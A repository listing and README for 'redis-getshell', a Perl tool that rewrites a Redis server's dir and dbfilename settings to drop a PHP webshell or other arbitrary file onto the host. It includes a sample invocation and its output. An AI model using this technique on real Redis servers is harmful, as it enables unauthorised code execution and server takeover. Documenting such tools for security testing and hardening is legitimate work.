https://github.com/caledoniaproject/redis-getshell
https://github.com/caledoniaproject/redis-getshell
Last synced: 11 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/caledoniaproject/redis-getshell
- Owner: CaledoniaProject
- Created: 2015-05-20T01:36:05.000Z (about 11 years ago)
- Default Branch: master
- Last Pushed: 2015-05-20T01:44:56.000Z (about 11 years ago)
- Last Synced: 2025-01-20T14:48:53.235Z (over 1 year ago)
- Language: Perl
- Size: 121 KB
- Stars: 2
- Watchers: 3
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
## redis-getshell
The script below demonstrates the possibility to dump a webshell through a redis server
## usage
%> ./redis-getshell.pl --host 127.0.0.1 --port 6379 --path /tmp/ooo.php
[+] Connection established 127.0.0.1:6379
[+] Receiving old dbfilename value
[+] Receiving old dir value
[+] Alternating configuration
-> dir /tmp
-> dbfilename ooo.php
-> webshell
[+] Restoring configuration
The script allow you to dump a file to anywhere writable, with arbritrary contents (--webshell parameter)
## legal disclaimer
Using this tool is legit but hacking may not be. The author does not take any responsibility for such activities.